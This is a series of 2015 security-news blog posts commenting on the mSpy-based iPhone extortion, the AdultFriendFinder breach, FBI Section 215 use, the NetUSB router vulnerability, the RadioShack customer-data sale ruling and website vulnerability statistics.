A New Form Of Ransomware

In addition to the traditional ransomware that everyone knows about, the AdultFriendFinder breach I wrote about earlier has the hackers blackmailing  users of the site.  Now, mSpy clients are being extorted too.

Brian Krebs is reporting that hackers are using the mSpy breach to extort iPhone users.  Apparently, users who have mSpy installed are asked for their iTunes userid and password so that mSpy can extract data from iCloud.

mSpy is used to spy on your “loved ones’ – strange concept – so you install it on their phones.  But, they are not supposed to know it is there.  What is not clear to me is whether the iTunes accounts of the spyees or spyors or both are in the hacked data.  From what I have read, it appears to be the spyee – hence they don’t know that their accounts have been compromised.

With all the user data from mSpy now available on the dark web, hackers are, very quickly, extracting those iTunes userids and passwords from the hacked data.

Next, using Tor, the hackers can log into iTunes using those ill-gotten credentials and using the find my phone feature, wipe the phone, set a message that said the phone has been hacked and tell the owner that only way they can get it back is to pay a ransom.

Since most Apply users rely on the Apple ecosystem for backups and the hackers have control of the user’s iTunes/iCloud account, the user, their phone, their data and their backups are all under the control of the hackers.  Assuming that the hacker has taken over their iTunes account, I don’t think they would be able to access their backups in iTunes on their Mac or PC, if they exist.

So, do you pay the ransom?  Or not?  A dilemma.

And, if you do, will the hacker return control of your iTunes account and phone?

One thing to consider is backups completely outside the Apple universe.  At least then you could get your data back.

Adult Dating Site Hacked; Member’s “Interests” Revealed

CNN and others have reported on the hacking of the adult dating site AdultFriendFinder, where members enter their interests in non-traditional sexual relationships.  Over 3 million members “interests” and other information were revealed in the data released so far.

According to the site, it has  “helped millions of people find traditional partners, swinger groups, threesomes, and a variety of other alternative partners.”  AdultFriendFinder claims to have over 60 million members, but data has been released on only around 3.5 million of those members.  Whether the hacker has more data to release later or not is unclear.

Information revealed includes email address, birthday, password and sexual preferences.  From this information, it is pretty easy to use social media and Google to figure people’s names.

The Mirror is saying that nude pictures of members were also part of the hacked data.

CIO magazine said that credit card data may be among the hacked data as well, but removed from the data available for sale.  They said the database is available for 70 bitcoins or around $17,000.

The hacker who claims to have done this said that he attempted to blackmail the site for $100,000, which I gather they did not pay.

Other hackers on the forum said that they planned to use the information to attack victims.  Apparently, a number of the members are government employees, including law enforcement.  One potential form of attack would be to blackmail the victims.

FriendFinder Networks, who owns the site along with other adult sites and publications, said that they didn’t know the extent of the breach, but were working with law enforcement and Mandiant.

In a statement they said “We cannot speculate further about this issue, but rest assured, we pledge to take the appropriate steps needed to protect our customers if they are affected,”

I am not sure how they might protect their customers – I don’t think there is reputation protection insurance available.

While users of a site like this should have an expectation of privacy, this should be a reminder that there are no guarantees.


FBI Admits No Major Terrorism Cases Solved Using Section 215

The DoJ IG just released an assessment of the FBI’s use of the mass data collection powers of section 215 of The Patriot Act, renewal of which is currently being debated in Congress and the report says that no case developments resulted from the use of Section 215 orders.  The Inspector General said:

"As with our previous reviews, the agents we interviewed did not identify any major case developments that resulted from the use of the records obtained in response to Section 215 orders, but told us that the material produced pursuant to Section 215 orders was valuable in that it is used to support other investigative requests, develop investigative leads and corroborate other information."

To be fair, the FBI’s use of Section 215 is minimal although increasing.

Also, the national security community (the NSA and related agencies) probably issued a lot more Section 215 requests than the FBI and this report does not include data on that.  Of course a request could say, as it did to Verizon, provide every single call record for these three months.  One order, lots of data.

Google for example, publishes data on ranges of the number of requests they get.  For the period January to June 2014 (the last period available), Google said they received less than a thousand FISA court requests covering around 15,000 accounts and less than a thousand National Security Letters covering less than a thousand accounts (see report).  Google should be considered one of the larger recipients of such letters along with Facebook and Microsoft, so the fact that those numbers are small does indicate some discretion in asking for information.

The IG’s report also talked about the FBI’s efforts at data minimization, which were required as part of the 2006 Patriot Act re-authorization.  Generally speaking, the IG said that the FBI was not compliant with the law, but after several reports (different years), the FBI is doing a better job.

All this was announced at a time when Congress is trying to figure out a path forward.  Absent Congressional Action, the provisions of Section 215 and some other sections of the Patriot Act expire on June 1, 2015.  Different groups in Congress have significantly different views on what should happen and one possibility is to kick the can down the road a few months, a technique Congress often uses.

The NSA said that if Congress had not granted them an extension of authority by today (May 22, 2015), that the NSA would begin winding down it’s Section 215 activities to make sure that they were compliant by June 1.

Congress will likely do something in the next week – before the Section 215 provisions expire.  This is one of those places where big, invasive government, national security and personal privacy collide and it is unclear what the result will be.

Millions Of Routers And Other Products Vulnerable To NetUSB Bug

Another day, another software supply chain exploit.  This time, Zytel and D-Link have confirmed that their routers have the bug, but researchers think products from Netgear, TP-Link, Trendnet and other vendors are vulnerable.  Already 90 plus products from more than 20 vendors have been potentially identified as vulnerable.  Only TP-Link has announced a patch.  The bug allows you to take control of the device in kernel mode.  Anyone taking bets that most owners will not patch this  (see article and article)?

The feature, NetUSB, allows users of an affected device to share a USB device over the network.  For some implementations, the sharing is only allowed on the local network, but other implementations may allow sharing over the Internet.  Still, that means that if you infect any device on the local network, you can take over the vulnerable router or other device.

Some manufacturers allow you to turn off the feature, but others do not.

The buggy software was bought from Taiwan based KCodes Technology.  What it takes to initiate the takeover is to connect to the affected device with a computer name longer than 64 characters.  This causes a buffer overflow and the rest is history.  That sounds hard, huh?

This is a supply chain problem because vendors like TP-Link (the only one that has released a patch so far) thought this was a nifty feature, so they bought the Linux software from KCodes, probably for very little money.  They did not do an extensive vulnerability assessment of the software – probably just looked at the sales flyer and tested it to see that it worked as described.

Netgear products, which are affected, calls the feature ReadySHARE, says they will release a patch this fall, but they have not announced specifically which products are vulnerable.  I am sure that hackers will be very patient and wait until after that patch is released this fall and you install the fix to attempt to exploit it.  NOT!

Oh, yeah, for at least Netgear devices, the feature cannot be disabled – even if disabling it would disable the driver itself and not just the user interface.  It also cannot be firewalled off.

Given the brands that have fessed up to using it, it is likely that most of the affected products are located in homes, home offices and small businesses.  How many of these groups even understand about patching something like a router?


Which is why software supply chain problems are a real problem.

Businesses that use technology or buy software (does that cover most businesses?) need to start dealing with the software supply chain issue, like now.  And it is not simple because when you buy the XYZ product it doesn’t say “contains software bought from the lowest cost vendor in Molnevia”.  THAT is part of the problem.


Radio Shack Cannot Sell Customer Info

After Radio Shack filed for bankruptcy, it was announced that Radio Shack was going to sell their customer information – over 100 million customers.

Quickly, several camps came to the bankruptcy court to argue against the sale.

First in line was AT&T (see article) and other carriers.  AT&T claimed that, based on their agreement with Radio Shack, the data belonged to them.

Next came the privacy advocates.  Radio Shack’s privacy policy said they would never sell or rent their customer list and this sure looked like that.

After that came the Attorney’s General of 38 states who argued this was a deceptive trade practice because it went against their written privacy policy.

Finally, the director of the privacy section of the Federal Trade Commission sent the court a letter arguing against allowing the sale.

Given all this, you would think it would be a slam dunk that the court would not allow it, but bankruptcy courts have a mind of their own.

What is also unclear is what conversations may have occurred off the record.  For example, the FTC may have told the court that they couldn’t stop the sale, but that they could issue an order to the buyer regarding the use of the records. One would have to assume that the buyer would want to use them in a sales capacity.

Well, the answer is out.

Texas AG Ken Paxton announced today that  the overwhelming bulk of the data will be destroyed;  no credit card or social security data will be transferred and out of the 8.5 million email addresses in the database, the buyer of the Radio Shack brand will only get to keep the email addresses – no phone numbers – of people who requested product information in the last two years.

The buyer will also have to agree to abide by Radio Shack’s former privacy policy.

All in all, this turned out pretty well for the privacy advocacy side.

This precedent adds weight to the legal theory that courts will really hold you to your privacy policy, even in the case of bankruptcy.

Half Of All Retail And Healthcare Websites Always Vulnerable

Following up on yesterday’s post on the time to detect hackers inside your systems, a new report today says that about half of the web sites of Retail and Healthcare businesses are always vulnerable, mostly because of slow remediation rates.

WhiteHat Security’s report (see article) says that 47% of applications tested had cross site scripting vulnerabilities, 56% leaked information and 70% did not secure communications sufficiently.

The developers argued that the 70% number wasn’t fair because that included sites that had not fixed heartbleed from last year  and heartbleed is really an infrastructure problem, not an application problem, (which kind of validates the slow remediation rate comment above).

But we have been talking about cross site scripting issues for years, so what are the developer’s excuses for that.

My take is that vulnerabilities are vulnerabilities and ONE person needs to be accountable for removing vulnerabilities.  Whether it is the developer or some other person, it needs to be someone that you can corner and say fix it.

One thing that helps developers of custom apps/web sites is that each site is a one-off.  If you figure out how to compromise Microsoft Office, you can use that to attack, say, “quite a few” people.  If I attack Joe’s plumbing’s web site, all I get is Joe’s 50,000 customers to infect.

Still, people (hackers) build automated tools to crawl the web to find vulnerabilities, so Joe shouldn’t rest too easy.  Also, Joe probably doesn’t understand static and dynamic code analysis techniques and other risk reduction techniques as well as Microsoft does, so there are probably way more vulnerabilities per 1,000 lines of code in Joe’s internal and public facing apps than in Office.  And, we never seem to run out of vulnerabilities in Office, so what does that say about Joe’s apps.

So, if you are Joe, you shouldn’t rest – get to fixin’ those vulnerabilities!